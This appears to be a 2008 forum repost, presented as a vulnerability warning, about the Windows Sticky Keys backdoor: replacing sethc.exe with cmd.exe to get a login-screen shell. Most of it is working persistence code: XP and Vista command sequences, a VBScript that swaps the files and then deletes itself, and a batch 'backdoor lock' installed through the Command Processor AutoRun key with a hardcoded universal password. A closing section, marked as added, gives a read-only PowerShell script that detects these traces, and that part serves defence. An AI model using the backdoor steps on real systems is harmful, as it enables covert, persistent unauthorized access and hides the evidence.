The coolest Windows backdoor - vulnerability warning - the black bar safety net

ID MYHACK58:62200818009
Type myhack58
Reporter Anonymous
Modified 2008-01-04T00:00:00


How the backdoor works:

Reposted from: small Chapter blog

In Windows 2000/XP/Vista, pressing the Shift key 5 times opens Sticky Keys, which runs sethc.exe; this also works at the login screen. It is reminiscent of the Windows screensaver trick: if the program is replaced with cmd.exe, you can open a shell.

Reference: McafeeAvertLabs

XP (with the installation source disc ejected, or the installation directory on the hard disk renamed):

    cd %windir%\system32\dllcache
    ren sethc.exe *.ex~
    cd %windir%\system32
    copy /y cmd.exe sethc.exe

VISTA:

    takeown /f c:\windows\system32\sethc.exe
    cacls c:\windows\system32\sethc.exe /G administrator:F

Then replace the file using the XP method.

At the login screen, press SHIFT 5 times and a cmd shell pops up, and then......

Backdoor extensions:

Reposted from: 7j blog

Updated again:

    Dim obj, success
    Set obj = CreateObject("WScript.Shell")
    ' Take ownership of sethc.exe and grant the current user full control
    success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)
    success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)
    ' Stage a copy of cmd.exe and keep a backup of the original sethc.exe
    success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)
    success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)
    ' Swap the staged copy into place
    success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)
    success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

The second sentence is the most interesting. Hey Responder.... I've encountered similar problems

Updated again: added a self-delete and simplified the code...

    On Error Resume Next
    Dim obj, success
    Set obj = CreateObject("WScript.Shell")
    ' Same steps as above, chained into one cmd line
    success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
    ' The script deletes itself afterwards
    CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

allyesno note: for ways to deal with File Protection you can also refer to my article "cut wfp 's jj easily" 8099&p=269293

Backdoor lock extension:

allyesno note: you can use the cmd lock to add password verification to the cmdshell. Hey....

To use the backdoor lock below, save the code as bdlock.bat

Then modify the following registry location:

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
    "AutoRun"="bdlock.bat"

    @Echo Off
    title back door login authentication
    color a
    cls
    set temprandom=%RANDOM%
    echo please enter the verification code:%temprandom%
    set/p check=
    if "%check%"=="%temprandom%%temprandom%" goto passcheck
    if "%check%"=="%temprandom%" (
    rem Backdoor Server Authentication
    rem If there is no backdoor authentication server, comment out the next line with rem
    if exist \\trojandownloader$\pass goto passcheck
    )
    echo verify failed
    pause
    exit
    :passcheck
    echo verification successful
    If "%passcmdlock%"=="" Goto endx
    Set passcmdlock=http://blog.csdn.net/freexploit/
    :allyesno
    Set Errorlevel=>nul
    Echo please enter the verification code?
    Set password=allyesno Is a pig>nul
    Set/p password=
    rem universal password
    if "%password%"=="allyesno is a sb" goto endx
    If %time:~1,1%==0 Set timechange=a
    If %time:~1,1%==1 Set timechange=b
    If %time:~1,1%==2 Set timechange=c
    If %time:~1,1%==3 Set timechange=d
    If %time:~1,1%==4 Set timechange=e
    If %time:~1,1%==5 Set timechange=f
    If %time:~1,1%==6 Set timechange=g
    If %time:~1,1%==7 Set timechange=h
    If %time:~1,1%==8 Set timechange=i
    If %time:~1,1%==9 Set timechange=j
    set/a sum=%time:~1,1%+%time:~1,1%
    Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul
    If "%errorlevel%"=="0" cls&Echo the password is correct&Goto End
    Echo please contact rising customer service for the correct password!&Goto allyesno
    :End
    Set password=>nul
    Set Errorlevel=>nul
    Echo is very good, very harmonious!
    :endx
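Added example, not part of the original post or the blogs it quotes: a read-only PowerShell check for the traces the steps above leave behind (a replaced sethc.exe, the leftover asethc.exe / acmd.exe / sethc.ex~ files, and the Command Processor AutoRun value). It assumes PowerShell 4.0 or later for Get-FileHash and a 64-bit console; the TrustedInstaller owner check and the HKCU lookup are additions beyond what the page describes.

```powershell
# Added defensive example: look for traces of the sethc.exe replacement and the
# Command Processor AutoRun hook described on this page. Read-only, changes nothing.
# Run from a 64-bit console: a 32-bit one is redirected from System32 to SysWOW64.
$sys32    = Join-Path $env:SystemRoot 'System32'
$sethc    = Join-Path $sys32 'sethc.exe'
$cmd      = Join-Path $sys32 'cmd.exe'
$findings = New-Object 'System.Collections.Generic.List[string]'

if (Test-Path -LiteralPath $sethc) {
    # 1. sethc.exe byte-identical to cmd.exe: the copy/ren step from the page.
    $hSethc = (Get-FileHash -LiteralPath $sethc -Algorithm SHA256).Hash
    $hCmd   = (Get-FileHash -LiteralPath $cmd   -Algorithm SHA256).Hash
    if ($hSethc -eq $hCmd) { $findings.Add('sethc.exe has the same SHA256 as cmd.exe') }

    # 2. Version resource no longer names sethc.exe (also catches other replacements).
    #    Heuristic: the value may carry a ".mui" suffix, hence the prefix match.
    $orig = (Get-Item -LiteralPath $sethc).VersionInfo.OriginalFilename
    if ($orig -notmatch '^sethc\.exe') { $findings.Add("sethc.exe OriginalFilename is '$orig'") }

    # 3. Ownership changed: on Vista and later the default owner is TrustedInstaller,
    #    and the takeown step on the page replaces it.
    $owner = (Get-Acl -LiteralPath $sethc).Owner
    if ($owner -notmatch 'TrustedInstaller') { $findings.Add("sethc.exe owner is '$owner'") }
} else {
    $findings.Add('sethc.exe is missing from System32')
}

# 4. Leftover files created by the commands and scripts shown on the page.
foreach ($rel in 'asethc.exe', 'acmd.exe', 'dllcache\sethc.ex~') {
    $p = Join-Path $sys32 $rel
    if (Test-Path -LiteralPath $p) { $findings.Add("leftover file present: $p") }
}

# 5. AutoRun command for cmd.exe (the page sets it under HKLM; HKCU is checked too).
foreach ($hive in 'HKLM:', 'HKCU:') {
    $key = "$hive\SOFTWARE\Microsoft\Command Processor"
    $val = (Get-ItemProperty -Path $key -Name AutoRun -ErrorAction SilentlyContinue).AutoRun
    if ($val) { $findings.Add("$key AutoRun = '$val'") }
}

if ($findings.Count -gt 0) {
    $findings | ForEach-Object { Write-Warning $_ }
} else {
    Write-Output 'No sethc.exe replacement or Command Processor AutoRun traces found.'
}
```

Each warning is a lead to verify rather than proof: an AutoRun value, for instance, can be set legitimately, so compare it against what the machine's owner expects to be there.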